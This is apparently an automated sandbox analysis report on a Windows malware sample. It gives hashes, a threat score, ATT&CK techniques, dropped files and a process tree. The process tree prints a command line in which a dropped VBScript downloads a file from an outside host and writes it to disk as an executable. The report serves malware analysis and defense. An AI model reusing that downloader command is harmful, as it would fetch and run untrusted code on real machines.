dd3d85c3d766625ee608713fdbb7fe2443f57436af6ce61dde7ee7b181207311

Analysis

max time kernel
147s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
08-04-2024 21:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

e86c9e4cfe51cb87741266d39cbd9cce_JaffaCakes118.exe
Size

119KB
MD5

e86c9e4cfe51cb87741266d39cbd9cce
SHA1

e84e645d1d330766f18bd8b286dee7e322ad0864
SHA256

dd3d85c3d766625ee608713fdbb7fe2443f57436af6ce61dde7ee7b181207311
SHA512

a066b0771537ab9732466ce97cd7e4b425fd278796aeb63701f9718e8b521690f1812e9a38b9b950ed1d1e94f7531df1f89c37f3252afd6983e8577a3c67df15
SSDEEP

3072:qUBZ36A3AhfmuJewyPn88iJkZmFxF2i64ZtwAw:qUrqA3AheuswyPn85Jgm16vAw

Score

7^/10

Malware Config

Signatures

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-513485977-2495024337-1260977654-1000\Control Panel\International\Geo\Nation	e86c9e4cfe51cb87741266d39cbd9cce_JaffaCakes118.exe

Executes dropped EXE 1 IoCs

pid	Process
2568	vbs11.exe

Drops file in Program Files directory 6 IoCs

description	ioc	Process
File created	C:\Program Files\sdfssdfsdf\__tmp_rar_sfx_access_check_240606015	e86c9e4cfe51cb87741266d39cbd9cce_JaffaCakes118.exe
File created	C:\Program Files\sdfssdfsdf\down.vbs	e86c9e4cfe51cb87741266d39cbd9cce_JaffaCakes118.exe
File opened for modification	C:\Program Files\sdfssdfsdf\down.vbs	e86c9e4cfe51cb87741266d39cbd9cce_JaffaCakes118.exe
File created	C:\Program Files\sdfssdfsdf\vbs11.exe	e86c9e4cfe51cb87741266d39cbd9cce_JaffaCakes118.exe
File opened for modification	C:\Program Files\sdfssdfsdf\vbs11.exe	e86c9e4cfe51cb87741266d39cbd9cce_JaffaCakes118.exe
File opened for modification	C:\Program Files\sdfssdfsdf	e86c9e4cfe51cb87741266d39cbd9cce_JaffaCakes118.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 1500 wrote to memory of 2568	1500	e86c9e4cfe51cb87741266d39cbd9cce_JaffaCakes118.exe	88
PID 1500 wrote to memory of 2568	1500	e86c9e4cfe51cb87741266d39cbd9cce_JaffaCakes118.exe	88
PID 1500 wrote to memory of 2568	1500	e86c9e4cfe51cb87741266d39cbd9cce_JaffaCakes118.exe	88
PID 2568 wrote to memory of 2876	2568	vbs11.exe	89
PID 2568 wrote to memory of 2876	2568	vbs11.exe	89
PID 2568 wrote to memory of 2876	2568	vbs11.exe	89
PID 2876 wrote to memory of 2380	2876	cmd.exe	91
PID 2876 wrote to memory of 2380	2876	cmd.exe	91
PID 2876 wrote to memory of 2380	2876	cmd.exe	91

C:\Users\Admin\AppData\Local\Temp\e86c9e4cfe51cb87741266d39cbd9cce_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\e86c9e4cfe51cb87741266d39cbd9cce_JaffaCakes118.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1500
- C:\Program Files\sdfssdfsdf\vbs11.exe
  "C:\Program Files\sdfssdfsdf\vbs11.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2568
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c C:\Users\Admin\AppData\Local\Temp\~5D72.bat "C:\Program Files\sdfssdfsdf\vbs11.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2876
  - - C:\Windows\SysWOW64\cscript.exe
      cscript down.vbs http://www.kangnai520.cn:88/vv.htm c:\good.exe
      4⤵
      PID:2380

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\sdfssdfsdf\down.vbs

Filesize
1KB

MD5
4ec7d8625b00a83ef4b93f6f8a1a97ab

SHA1
2638217106e17b2f99221f67ffdf9e56a8fe5293

SHA256
e5707cbf9b0853f22bcc139e4c77b39c640077e430edf3a4e138b46ccf9499a4

SHA512
fd753a60588af4155fa564430175a99ecdef4539f82b2718b6a2f8f272339952fcb9b0e5c65ac0d71fce978e6b67765f4f479e98e6afde3aebe824a1bf24bde3

Download Submit
C:\Program Files\sdfssdfsdf\vbs11.exe

Filesize
58KB

MD5
0fd35fa306511224cc7526028e69d1c8

SHA1
497a54cd652a3d31c49942b10d020816c7f2ac55

SHA256
917cafe9176efc3dd62442e6aa69c0cadc150bc6240f9d399b4d3f4f45ccb44d

SHA512
48a5abcaf992b7e8a87ea6360cdf84238e9d68fa56eaa99ca3f99f4325cf29acd718fcb4cfdaa70b28b34996f7b95871999389640c789115de7cab2e6c79e63b

Download Submit
C:\Users\Admin\AppData\Local\Temp\~5D72.bat

Filesize
100B

MD5
ee88e1ecb1e28056f1801c8e3539a467

SHA1
199953af609165384fae50b25bbb51e4091cbb7d

SHA256
7b5a9a3fc2ee31d97bd642d6768f004cca051e756271db1b06c2673d32fbe09e

SHA512
310640c704eaada227883a15bef552fdb9356bde21a6d8eed118d13ab7d0dd367ccd914b04b4e2e9b095e8919968b7594cd17b8184570d1a2b9ce2db11a11001

Download Submit
memory/2568-17-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download